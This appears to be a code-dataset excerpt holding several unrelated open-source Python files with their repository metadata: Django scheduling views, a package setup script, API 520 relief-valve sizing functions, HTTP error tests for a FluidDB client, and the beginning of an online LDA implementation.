isostring_naive_local = str_date + "T" + str_time
dt_naive_local = datetime.datetime.strptime(isostring_naive_local, "%Y-%m-%dT%H:%M")
dt_aware_local = tz.localize(dt_naive_local)
dt_aware_utc = dt_aware_local.astimezone(utc)
return dt_aware_utc
# Actual views
def index(request):
data_dict = dict(version=1)
return render_to_response('agenda/index.html', data_dict,
context_instance=RequestContext(request))
class ResourceView(TemplateView):
def get_context_data(self, **kwargs):
context = super(ResourceView, self).get_context_data(**kwargs)
context[self.resource] = list(self.Model.all())
return context
def get(self, request, *args, **kwargs):
context = self.get_context_data(**kwargs)
context["form"] = self.Form()
return self.render_to_response(context)
def post(self, request, *args, **kwargs):
if request.POST.get("method", "") == "delete":
return self.pseudodelete(request, *args, **kwargs)
form = self.Form(request.POST)
if form.is_valid():
d = self.prepare_form_data(form)
resource = self.SaveModel(**d)
resource.save()
messages.success(request,
_('Resource %(id)s saved.') % {"id": resource.id})
redirect_url = request.POST.get("redirect", reverse(self.resource))
return redirect(redirect_url)
else:
messages.error(request, "Error validating data: %s" % repr(form))
context = self.get_context_data(**kwargs)
context["form"] = form
return self.render_to_response(context)
def pseudodelete(self, request, *args, **kwargs):
context = self.get_context_data(**kwargs)
oid = request.POST.get("id", None)
try:
resource = self.Model.delete_id(oid)
except self.Model.DoesNotExist:
raise Http404
messages.success(request,
_('Resource %(id)s deleted.') % {"id": oid})
return redirect(reverse(self.resource))
def prepare_form_data(self, form):
raise NotImplemented
class ShiftView(ResourceView):
resource = "shifts"
Model = Shift
Form = ShiftForm
SaveModel = Shift
template_name = 'agenda/shifts.html'
def prepare_form_data(self, form):
date = form.cleaned_data["date"]
start = str_to_datetime(date, form.cleaned_data["start"])
end = str_to_datetime(date, form.cleaned_data["end"])
return {FIELD_SEPARATOR.join(("start", "datetime")): start,
FIELD_SEPARATOR.join(("end", "datetime")): end}
class AppointmentView(ResourceView):
resource = "appointments"
Model = Appointment
Form = AppointmentForm
SaveModel = Appointment
template_name = 'agenda/appointments.html'
def prepare_form_data(self, form):
date = form.cleaned_data["date"]
start = str_to_datetime(date, form.cleaned_data["start"])
end = str_to_datetime(date, form.cleaned_data["end"])
return {
FIELD_SEPARATOR.join(("start", "datetime")): start,
FIELD_SEPARATOR.join(("end", "datetime")): end}
class SlotView(ResourceView):
resource = "freeslots"
Model = Slot
Form = QuickAppointmentForm
SaveModel = Appointment
template_name = "agenda/slots.html"
def get_context_data(self, **kwargs):
context = super(ResourceView, self).get_context_data(**kwargs)
try:
year = int(kwargs['year'])
month = int(kwargs['month'])
day = int(kwargs['day'])
basedate = datetime.date(year, month, day)
except:
basedate = datetime.date.today()
prev = basedate - datetime.timedelta(days=1)
next = basedate + datetime.timedelta(days=1)
selectdate = [basedate + datetime.timedelta(days=i) for i in range(-1, 7)]
start = datetime.datetime.combine(basedate, datetime.time(0))
end = datetime.datetime.combine(basedate, datetime.time.max)
context["basedate"] = basedate
context["prev"] = prev
context["next"] = next
context["selectdate"] = selectdate
context[self.resource] = self.Model.all(length=DEFAULT_SLOT_LENGTH,
start=datetime_to_dtstring(start),
end=datetime_to_dtstring(end))
return context
def prepare_form_data(self, form):
start = form.cleaned_data["start_dt"].astimezone(utc)
end = form.cleaned_data["end_dt"].astimezone(utc)
return {
FIELD_SEPARATOR.join(("start", "datetime")): start,
FIELD_SEPARATOR.join(("end", "datetime")): end, }
|
isc
| -347,853,227,394,681,300
| 35.535484
| 88
| 0.620696
| false
| 3.962911
| false
| false
| false
|
nexiles/nexiles.gateway.example
|
src/nexiles.gateway.example/setup.py
|
1
|
1111
|
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
version = '0.1.0'
long_description = (read('../../readme.rst'))
setup(name='nexiles.gateway.example',
version=version,
description="A example nexiles|gateway service",
long_description=long_description,
classifiers=[
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
],
keywords='',
author='Stefan Eletzhofer',
author_email='se@nexiles.de',
url='https://github.com/nexiles/nexiles.gateway.example',
license='proprietary',
packages=find_packages('.', exclude=['ez_setup']),
package_dir={'': '.'},
package_data={"nexiles.gateway.example": ["templates/*"]},
namespace_packages=['nexiles', 'nexiles.gateway'],
include_package_data=True,
zip_safe=True,
install_requires=['setuptools',
# 'nexiles.tools>=1.5.0'
],
)
|
bsd-2-clause
| -5,127,291,134,699,237,000
| 29.861111
| 73
| 0.594959
| false
| 3.884615
| false
| false
| false
|
CalebBell/fluids
|
fluids/safety_valve.py
|
1
|
22965
|
# -*- coding: utf-8 -*-
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
This module contains functions for sizing and rating pressure relief valves.
At present, this consists of several functions from API 520.
For reporting bugs, adding feature requests, or submitting pull requests,
please use the `GitHub issue tracker <https://github.com/CalebBell/fluids/>`_
or contact the author at Caleb.Andrew.Bell@gmail.com.
.. contents:: :local:
Interfaces
----------
.. autofunction:: API520_A_g
.. autofunction:: API520_A_steam
Functions and Data
------------------
.. autofunction:: API520_round_size
.. autofunction:: API520_C
.. autofunction:: API520_F2
.. autofunction:: API520_Kv
.. autofunction:: API520_N
.. autofunction:: API520_SH
.. autofunction:: API520_B
.. autofunction:: API520_W
.. autodata:: API526_letters
.. autodata:: API526_A_sq_inch
.. autodata:: API526_A
"""
from __future__ import division
from math import exp, sqrt
from fluids.constants import psi, inch, atm
from fluids.compressible import is_critical_flow
from fluids.numerics import interp, tck_interp2d_linear, bisplev
__all__ = ['API526_A_sq_inch', 'API526_letters', 'API526_A',
'API520_round_size', 'API520_C', 'API520_F2', 'API520_Kv', 'API520_N',
'API520_SH', 'API520_B', 'API520_W', 'API520_A_g', 'API520_A_steam']
API526_A_sq_inch = [0.110, 0.196, 0.307, 0.503, 0.785, 1.287, 1.838, 2.853, 3.60,
4.34, 6.38, 11.05, 16.00, 26.00] # square inches
'''list: Nominal relief area in for different valve sizes in API 520, [in^2]'''
API526_letters = ['D', 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R','T']
'''list: Letter size designations for different valve sizes in API 520'''
inch2 = inch*inch
API526_A = [i*inch2 for i in API526_A_sq_inch]
'''list: Nominal relief area in for different valve sizes in API 520, [m^2]'''
del inch2
def API520_round_size(A):
r'''Rounds up the area from an API 520 calculation to an API526 standard
valve area. The returned area is always larger or equal to the input area.
Parameters
----------
A : float
Minimum discharge area [m^2]
Returns
-------
area : float
Actual discharge area [m^2]
Notes
-----
To obtain the letter designation of an input area, lookup the area with
the following:
API526_letters[API526_A.index(area)]
An exception is raised if the required relief area is larger than any of
the API 526 sizes.
Examples
--------
From [1]_, checked with many points on Table 8.
>>> API520_round_size(1E-4)
0.00012645136
>>> API526_letters[API526_A.index(API520_round_size(1E-4))]
'E'
References
----------
.. [1] API Standard 526.
'''
for area in API526_A:
if area >= A:
return area
raise ValueError('Required relief area is larger than can be provided with one valve')
def API520_C(k):
r'''Calculates coefficient C for use in API 520 critical flow relief valve
sizing.
.. math::
C = 0.03948\sqrt{k\left(\frac{2}{k+1}\right)^\frac{k+1}{k-1}}
Parameters
----------
k : float
Isentropic coefficient or ideal gas heat capacity ratio [-]
Returns
-------
C : float
Coefficient `C` [-]
Notes
-----
If C cannot be established, assume a coefficient of 0.0239,
the highest value possible for C.
Although not dimensional, C varies with the units used.
If k is exactly equal to 1, the expression is undefined, and the formula
must be simplified as follows from an application of L'Hopital's rule.
.. math::
C = 0.03948\sqrt{\frac{1}{e}}
Examples
--------
From [1]_, checked with many points on Table 8.
>>> API520_C(1.35)
0.02669419967057233
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
if k != 1:
return 0.03948*sqrt(k*(2./(k+1.))**((k+1.)/(k-1.)))
else:
return 0.03948*sqrt(1./exp(1))
def API520_F2(k, P1, P2):
r'''Calculates coefficient F2 for subcritical flow for use in API 520
subcritical flow relief valve sizing.
.. math::
F_2 = \sqrt{\left(\frac{k}{k-1}\right)r^\frac{2}{k}
\left[\frac{1-r^\frac{k-1}{k}}{1-r}\right]}
.. math::
r = \frac{P_2}{P_1}
Parameters
----------
k : float
Isentropic coefficient or ideal gas heat capacity ratio [-]
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
P2 : float
Built-up backpressure; the increase in pressure during flow at the
outlet of a pressure-relief device after it opens, [Pa]
Returns
-------
F2 : float
Subcritical flow coefficient `F2` [-]
Notes
-----
F2 is completely dimensionless.
Examples
--------
From [1]_ example 2, matches.
>>> API520_F2(1.8, 1E6, 7E5)
0.8600724121105563
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
r = P2/P1
return sqrt(k/(k-1)*r**(2./k) * ((1-r**((k-1.)/k))/(1.-r)))
def API520_Kv(Re):
r'''Calculates correction due to viscosity for liquid flow for use in
API 520 relief valve sizing.
.. math::
K_v = \left(0.9935 + \frac{2.878}{Re^{0.5}} + \frac{342.75}
{Re^{1.5}}\right)^{-1}
Parameters
----------
Re : float
Reynolds number for flow out the valve [-]
Returns
-------
Kv : float
Correction due to viscosity [-]
Notes
-----
Reynolds number in the standard is defined as follows, with Q in L/min, G1
as specific gravity, mu in centipoise, and area in mm^2:
.. math::
Re = \frac{Q(18800G_1)}{\mu \sqrt{A}}
It is unclear how this expression was derived with a constant of 18800;
the following code demonstrates what the constant should be:
>>> from scipy.constants import *
>>> liter/minute*1000./(0.001*(milli**2)**0.5)
16666.666666666668
Examples
--------
From [1]_, checked with example 5.
>>> API520_Kv(100)
0.6157445891444229
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
return (0.9935 + 2.878/sqrt(Re) + 342.75/Re**1.5)**-1.0
def API520_N(P1):
r'''Calculates correction due to steam pressure for steam flow for use in
API 520 relief valve sizing.
.. math::
K_N = \frac{0.02764P_1-1000}{0.03324P_1-1061}
Parameters
----------
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
Returns
-------
KN : float
Correction due to steam temperature [-]
Notes
-----
Although not dimensional, KN varies with the units used.
For temperatures above 922 K or 22057 kPa, KN is not defined.
Internally, units of kPa are used to match the equation in the standard.
Examples
--------
Custom example:
>>> API520_N(1774700)
0.9490406958152466
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
P1 = P1/1000. # Pa to kPa
return (0.02764*P1-1000.)/(0.03324*P1-1061)
_KSH_psigs = [15, 20, 40, 60, 80, 100, 120, 140, 160, 180, 200, 220, 240, 260,
280, 300, 350, 400, 500, 600, 800, 1000, 1250, 1500, 1750, 2000,
2500, 3000]
_KSH_tempFs = [300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200]
# _KSH_psigs converted from psig to Pa
_KSH_Pa = [204746.3593975254, 239220.14586336722, 377115.29172673443,
515010.4375901016, 652905.5834534689, 790800.7293168361,
928695.8751802032, 1066591.0210435705, 1204486.1669069377,
1342381.312770305, 1480276.4586336722, 1618171.6044970395,
1756066.7503604065, 1893961.8962237737, 2031857.042087141,
2169752.187950508, 2514490.0526089263, 2859227.9172673444,
3548703.64658418, 4238179.375901016, 5617130.834534689,
6996082.29316836, 8719771.616460452, 10443460.939752541,
12167150.263044631, 13890839.58633672, 17338218.232920904,
20785596.879505083]
# _KSH_tempFs converted from F to K
_KSH_tempKs = [422.03888888888889, 477.59444444444443, 533.14999999999998,
588.70555555555552, 644.26111111111106, 699.81666666666661,
755.37222222222226, 810.92777777777769, 866.48333333333335,
922.03888888888889]
_KSH_factors = [[1, 0.98, 0.93, 0.88, 0.84, 0.8, 0.77, 0.74, 0.72, 0.7],
[1, 0.98, 0.93, 0.88, 0.84, 0.8, 0.77, 0.74, 0.72, 0.7],
[1, 0.99, 0.93, 0.88, 0.84, 0.81, 0.77, 0.74, 0.72, 0.7],
[1, 0.99, 0.93, 0.88, 0.84, 0.81, 0.77, 0.75, 0.72, 0.7],
[1, 0.99, 0.93, 0.88, 0.84, 0.81, 0.77, 0.75, 0.72, 0.7],
[1, 0.99, 0.94, 0.89, 0.84, 0.81, 0.77, 0.75, 0.72, 0.7],
[1, 0.99, 0.94, 0.89, 0.84, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 0.99, 0.94, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 0.99, 0.94, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 0.99, 0.94, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 0.99, 0.95, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 0.99, 0.95, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.95, 0.9, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.95, 0.9, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.9, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.9, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.9, 0.86, 0.82, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.91, 0.86, 0.82, 0.78, 0.75, 0.72, 0.7],
[1, 1, 0.96, 0.92, 0.86, 0.82, 0.78, 0.75, 0.73, 0.7],
[1, 1, 0.97, 0.92, 0.87, 0.82, 0.79, 0.75, 0.73, 0.7],
[1, 1, 1, 0.95, 0.88, 0.83, 0.79, 0.76, 0.73, 0.7],
[1, 1, 1, 0.96, 0.89, 0.84, 0.78, 0.76, 0.73, 0.71],
[1, 1, 1, 0.97, 0.91, 0.85, 0.8, 0.77, 0.74, 0.71],
[1, 1, 1, 1, 0.93, 0.86, 0.81, 0.77, 0.74, 0.71],
[1, 1, 1, 1, 0.94, 0.86, 0.81, 0.77, 0.73, 0.7],
[1, 1, 1, 1, 0.95, 0.86, 0.8, 0.76, 0.72, 0.69],
[1, 1, 1, 1, 0.95, 0.85, 0.78, 0.73, 0.69, 0.66],
[1, 1, 1, 1, 1, 0.82, 0.74, 0.69, 0.65, 0.62]]
API520_KSH_tck = tck_interp2d_linear(_KSH_tempKs, _KSH_Pa, _KSH_factors)
def API520_SH(T1, P1):
r'''Calculates correction due to steam superheat for steam flow for use in
API 520 relief valve sizing. 2D interpolation among a table with 28
pressures and 10 temperatures is performed.
Parameters
----------
T1 : float
Temperature of the fluid entering the valve [K]
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
Returns
-------
KSH : float
Correction due to steam superheat [-]
Notes
-----
For P above 20679 kPag, use the critical flow model.
Superheat cannot be above 649 degrees Celsius.
If T1 is above 149 degrees Celsius, returns 1.
Examples
--------
Custom example from table 9:
>>> API520_SH(593+273.15, 1066.325E3)
0.7201800000000002
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
if P1 > 20780325.0: # 20679E3+atm
raise ValueError('For P above 20679 kPag, use the critical flow model')
if T1 > 922.15:
raise ValueError('Superheat cannot be above 649 degrees Celcius')
if T1 < 422.15:
return 1. # No superheat under 15 psig
return float(bisplev(T1, P1, API520_KSH_tck))
# Kw, for liquids. Applicable for all overpressures.
Kw_x = [15., 16.5493, 17.3367, 18.124, 18.8235, 19.5231, 20.1351, 20.8344,
21.4463, 22.0581, 22.9321, 23.5439, 24.1556, 24.7674, 25.0296, 25.6414,
26.2533, 26.8651, 27.7393, 28.3511, 28.9629, 29.6623, 29.9245, 30.5363,
31.2357, 31.8475, 32.7217, 33.3336, 34.0329, 34.6448, 34.8196, 35.4315,
36.1308, 36.7428, 37.7042, 38.3162, 39.0154, 39.7148, 40.3266, 40.9384,
41.6378, 42.7742, 43.386, 43.9978, 44.6098, 45.2216, 45.921, 46.5329,
47.7567, 48.3685, 49.0679, 49.6797, 50.]
Kw_y = [1, 0.996283, 0.992565, 0.987918, 0.982342, 0.976766, 0.97119, 0.964684,
0.958178, 0.951673, 0.942379, 0.935874, 0.928439, 0.921933, 0.919145,
0.912639, 0.906134, 0.899628, 0.891264, 0.884758, 0.878253, 0.871747,
0.868959, 0.862454, 0.855948, 0.849442, 0.841078, 0.834572, 0.828067,
0.821561, 0.819703, 0.814126, 0.806691, 0.801115, 0.790892, 0.785316,
0.777881, 0.771375, 0.76487, 0.758364, 0.751859, 0.740706, 0.734201,
0.727695, 0.722119, 0.715613, 0.709108, 0.702602, 0.69052, 0.684015,
0.677509, 0.671004, 0.666357]
def API520_W(Pset, Pback):
r'''Calculates capacity correction due to backpressure on balanced
spring-loaded PRVs in liquid service. For pilot operated valves,
this is always 1. Applicable up to 50% of the percent gauge backpressure,
For use in API 520 relief valve sizing. 1D interpolation among a table with
53 backpressures is performed.
Parameters
----------
Pset : float
Set pressure for relief [Pa]
Pback : float
Backpressure, [Pa]
Returns
-------
KW : float
Correction due to liquid backpressure [-]
Notes
-----
If the calculated gauge backpressure is less than 15%, a value of 1 is
returned.
Examples
--------
Custom example from figure 31:
>>> API520_W(1E6, 3E5) # 22% overpressure
0.9511471848008564
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
gauge_backpressure = (Pback-atm)/(Pset-atm)*100.0 # in percent
if gauge_backpressure < 15.0:
return 1.0
return interp(gauge_backpressure, Kw_x, Kw_y)
# Kb Backpressure correction factor, for gases
Kb_16_over_x = [37.6478, 38.1735, 38.6991, 39.2904, 39.8817, 40.4731, 40.9987,
41.59, 42.1156, 42.707, 43.2326, 43.8239, 44.4152, 44.9409,
45.5322, 46.0578, 46.6491, 47.2405, 47.7661, 48.3574, 48.883,
49.4744, 50.0]
Kb_16_over_y = [0.998106, 0.994318, 0.99053, 0.985795, 0.982008, 0.97822,
0.973485, 0.96875, 0.964962, 0.961174, 0.956439, 0.951705,
0.947917, 0.943182, 0.939394, 0.935606, 0.930871, 0.926136,
0.921402, 0.918561, 0.913826, 0.910038, 0.90625]
Kb_10_over_x = [30.0263, 30.6176, 31.1432, 31.6689, 32.1945, 32.6544, 33.18,
33.7057, 34.1656, 34.6255, 35.0854, 35.5453, 36.0053, 36.4652,
36.9251, 37.385, 37.8449, 38.2392, 38.6334, 39.0276, 39.4875,
39.9474, 40.4074, 40.8016, 41.1958, 41.59, 42.0499, 42.4442,
42.8384, 43.2326, 43.6925, 44.0867, 44.4809, 44.8752, 45.2694,
45.6636, 46.0578, 46.452, 46.8463, 47.2405, 47.6347, 48.0289,
48.4231, 48.883, 49.2773, 49.6715]
Kb_10_over_y = [0.998106, 0.995265, 0.99053, 0.985795, 0.981061, 0.975379,
0.969697, 0.963068, 0.957386, 0.950758, 0.945076, 0.938447,
0.930871, 0.925189, 0.918561, 0.910985, 0.904356, 0.897727,
0.891098, 0.883523, 0.876894, 0.870265, 0.862689, 0.856061,
0.848485, 0.840909, 0.83428, 0.827652, 0.820076, 0.8125,
0.805871, 0.798295, 0.79072, 0.783144, 0.775568, 0.768939,
0.762311, 0.754735, 0.747159, 0.739583, 0.732008, 0.724432,
0.716856, 0.70928, 0.701705, 0.695076]
def API520_B(Pset, Pback, overpressure=0.1):
r'''Calculates capacity correction due to backpressure on balanced
spring-loaded PRVs in vapor service. For pilot operated valves,
this is always 1. Applicable up to 50% of the percent gauge backpressure,
For use in API 520 relief valve sizing. 1D interpolation among a table with
53 backpressures is performed.
Parameters
----------
Pset : float
Set pressure for relief [Pa]
Pback : float
Backpressure, [Pa]
overpressure : float, optional
The maximum fraction overpressure; one of 0.1, 0.16, or 0.21, [-]
Returns
-------
Kb : float
Correction due to vapor backpressure [-]
Notes
-----
If the calculated gauge backpressure is less than 30%, 38%, or 50% for
overpressures of 0.1, 0.16, or 0.21, a value of 1 is returned.
Percent gauge backpressure must be under 50%.
Examples
--------
Custom examples from figure 30:
>>> API520_B(1E6, 5E5)
0.7929945420944432
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
gauge_backpressure = (Pback-atm)/(Pset-atm)*100.0 # in percent
if overpressure not in (0.1, 0.16, 0.21):
raise ValueError('Only overpressure of 10%, 16%, or 21% are permitted')
if (overpressure == 0.1 and gauge_backpressure < 30.0) or (
overpressure == 0.16 and gauge_backpressure < 38.0) or (
overpressure == 0.21 and gauge_backpressure < 50.0):
return 1.0
elif gauge_backpressure > 50.0:
raise ValueError('Gauge pressure must be < 50%')
if overpressure == 0.16:
Kb = interp(gauge_backpressure, Kb_16_over_x, Kb_16_over_y)
elif overpressure == 0.1:
Kb = interp(gauge_backpressure, Kb_10_over_x, Kb_10_over_y)
return Kb
def API520_A_g(m, T, Z, MW, k, P1, P2=101325, Kd=0.975, Kb=1, Kc=1):
r'''Calculates required relief valve area for an API 520 valve passing
a gas or a vapor, at either critical or sub-critical flow.
For critical flow:
.. math::
A = \frac{m}{CK_dP_1K_bK_c}\sqrt{\frac{TZ}{M}}
For sub-critical flow:
.. math::
A = \frac{17.9m}{F_2K_dK_c}\sqrt{\frac{TZ}{MP_1(P_1-P_2)}}
Parameters
----------
m : float
Mass flow rate of vapor through the valve, [kg/s]
T : float
Temperature of vapor entering the valve, [K]
Z : float
Compressibility factor of the vapor, [-]
MW : float
Molecular weight of the vapor, [g/mol]
k : float
Isentropic coefficient or ideal gas heat capacity ratio [-]
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
P2 : float, optional
Built-up backpressure; the increase in pressure during flow at the
outlet of a pressure-relief device after it opens, [Pa]
Kd : float, optional
The effective coefficient of discharge, from the manufacturer or for
preliminary sizing, using 0.975 normally or 0.62 when used with a
rupture disc as described in [1]_, []
Kb : float, optional
Correction due to vapor backpressure [-]
Kc : float, optional
Combination correction factor for installation with a ruture disk
upstream of the PRV, []
Returns
-------
A : float
Minimum area for relief valve according to [1]_, [m^2]
Notes
-----
Units are interlally kg/hr, kPa, and mm^2 to match [1]_.
Examples
--------
Example 1 from [1]_ for critical flow, matches:
>>> API520_A_g(m=24270/3600., T=348., Z=0.90, MW=51., k=1.11, P1=670E3, Kb=1, Kc=1)
0.0036990460646834414
Example 2 from [1]_ for sub-critical flow, matches:
>>> API520_A_g(m=24270/3600., T=348., Z=0.90, MW=51., k=1.11, P1=670E3, P2=532E3, Kd=0.975, Kb=1, Kc=1)
0.004248358775943481
The mass flux in (kg/(s*m^2)) can be found by dividing the specified mass
flow by the calculated area:
>>> (24270/3600.)/API520_A_g(m=24270/3600., T=348., Z=0.90, MW=51., k=1.11, P1=670E3, Kb=1, Kc=1)
1822.541960488834
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
P1, P2 = P1/1000., P2/1000. # Pa to Kpa in the standard
m = m*3600. # kg/s to kg/hr
if is_critical_flow(P1, P2, k):
C = API520_C(k)
A = m/(C*Kd*Kb*Kc*P1)*sqrt(T*Z/MW)
else:
F2 = API520_F2(k, P1, P2)
A = 17.9*m/(F2*Kd*Kc)*sqrt(T*Z/(MW*P1*(P1-P2)))
return A*0.001**2 # convert mm^2 to m^2
def API520_A_steam(m, T, P1, Kd=0.975, Kb=1, Kc=1):
r'''Calculates required relief valve area for an API 520 valve passing
a steam, at either saturation or superheat but not partially condensed.
.. math::
A = \frac{190.5m}{P_1 K_d K_b K_c K_N K_{SH}}
Parameters
----------
m : float
Mass flow rate of steam through the valve, [kg/s]
T : float
Temperature of steam entering the valve, [K]
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
Kd : float, optional
The effective coefficient of discharge, from the manufacturer or for
preliminary sizing, using 0.975 normally or 0.62 when used with a
rupture disc as described in [1]_, []
Kb : float, optional
Correction due to vapor backpressure [-]
Kc : float, optional
Combination correction factor for installation with a rupture disk
upstream of the PRV, []
Returns
-------
A : float
Minimum area for relief valve according to [1]_, [m^2]
Notes
-----
Units are interlally kg/hr, kPa, and mm^2 to match [1]_.
With the provided temperature and pressure, the KN coefficient is
calculated with the function API520_N; as is the superheat correction KSH,
with the function API520_SH.
Examples
--------
Example 4 from [1]_, matches:
>>> API520_A_steam(m=69615/3600., T=592.5, P1=12236E3, Kd=0.975, Kb=1, Kc=1)
0.0011034712423692733
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
KN = API520_N(P1)
KSH = API520_SH(T, P1)
P1 = P1/1000. # Pa to kPa
m = m*3600. # kg/s to kg/hr
A = 190.5*m/(P1*Kd*Kb*Kc*KN*KSH)
return A*0.001**2 # convert mm^2 to m^2
|
mit
| -2,173,164,278,899,110,400
| 32.722467
| 107
| 0.610886
| false
| 2.785324
| false
| false
| false
|
fluidinfo/fom
|
tests/test_errors.py
|
1
|
2470
|
import unittest
from fom.api import FluidApi
from fom.errors import (
Fluid400Error,
Fluid401Error,
Fluid404Error,
Fluid406Error,
Fluid412Error,
Fluid413Error,
Fluid500Error,
)
from _base import FakeFluidDB
class ErrorTest(unittest.TestCase):
def setUp(self):
self.db = FakeFluidDB()
self.api = FluidApi(self.db)
def test400(self):
self.db.add_resp(400, 'application/json', 'Not Found')
self.assertRaises(Fluid400Error,
self.api.namespaces['test'].delete)
def test401(self):
self.db.add_resp(401, 'text/plain', 'Unauthorized')
self.assertRaises(Fluid401Error,
self.api.namespaces['test'].delete)
def test404(self):
self.db.add_resp(404, 'text/plain', 'Not Found')
self.assertRaises(Fluid404Error,
self.api.namespaces['test'].delete)
def test406(self):
self.db.add_resp(406, 'text/plain', 'Not Acceptable')
self.assertRaises(Fluid406Error,
self.api.namespaces['test'].delete)
def test412(self):
self.db.add_resp(412, 'text/plain', 'Precondition Failed')
self.assertRaises(Fluid412Error,
self.api.namespaces['test'].delete)
def test413(self):
self.db.add_resp(413, 'text/plain', 'Request Entity Too Large')
self.assertRaises(Fluid413Error,
self.api.namespaces['test'].delete)
def test500(self):
self.db.add_resp(500, 'text/plain', 'Internal Server Error')
self.assertRaises(Fluid500Error,
self.api.namespaces['test'].delete)
def testErrorObject(self):
"""
Ensures that the exception object has the correct attributes.
"""
class FakeResponse(object):
"""
Mock class.
"""
def __init__(self, status, error, request_id):
self.status = status
self.error = error
self.request_id = request_id
fake_response = FakeResponse('500', 'Server Error', '12345')
err = Fluid500Error(fake_response)
self.assertEqual('500', err.status)
self.assertEqual('Server Error', err.fluid_error)
self.assertEqual('12345', err.request_id)
self.assertEqual(fake_response, err.response)
if __name__ == '__main__':
unittest.main()
|
mit
| 6,300,827,892,538,906,000
| 28.759036
| 71
| 0.583401
| false
| 3.939394
| true
| false
| false
|
rueckstiess/jiratopic
|
onlineldavb/onlineldavb.py
|
1
|
11963
|
# onlineldavb.py: Package of functions for fitting Latent Dirichlet
# Allocation (LDA) with online variational Bayes (VB).
#
# Copyright (C) 2010 Matthew D. Hoffman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, re, time, string
import numpy as n
from scipy.special import gammaln, psi
n.random.seed(100000001)
meanchangethresh = 0.001
def dirichlet_expectation(alpha):
"""
For a vector theta ~ Dir(alpha), computes E[log(theta)] given alpha.
"""
if (len(alpha.shape) == 1):
return(psi(alpha) - psi(n.sum(alpha)))
return(psi(alpha) - psi(n.sum(alpha, 1))[:, n.newaxis])
def parse_doc_list(docs, vocab):
"""
Parse a document into a list of word ids and a list of counts,
or parse a set of documents into two lists of lists of word ids
and counts.
Arguments:
docs: List of D documents. Each document must be represented as
a single string. (Word order is unimportant.) Any
words not in the vocabulary will be ignored.
vocab: Dictionary mapping from words to integer ids.
Returns a pair of lists of lists.
The first, wordids, says what vocabulary tokens are present in
each document. wordids[i][j] gives the jth unique token present in
document i. (Don't count on these tokens being in any particular
order.)
The second, wordcts, says how many times each vocabulary token is
present. wordcts[i][j] is the number of times that the token given
by wordids[i][j] appears in document i.
"""
if (type(docs).__name__ == 'str'):
temp = list()
temp.append(docs)
docs = temp
D = len(docs)
wordids = list()
wordcts = list()
for d in range(0, D):
docs[d] = docs[d].lower()
docs[d] = re.sub(r'-', ' ', docs[d])
docs[d] = re.sub(r'[^a-z ]', '', docs[d])
docs[d] = re.sub(r' +', ' ', docs[d])
words = string.split(docs[d])
ddict = dict()
for word in words:
if (word in vocab):
wordtoken = vocab[word]
if (not wordtoken in ddict):
ddict[wordtoken] = 0
ddict[wordtoken] += 1
wordids.append(ddict.keys())
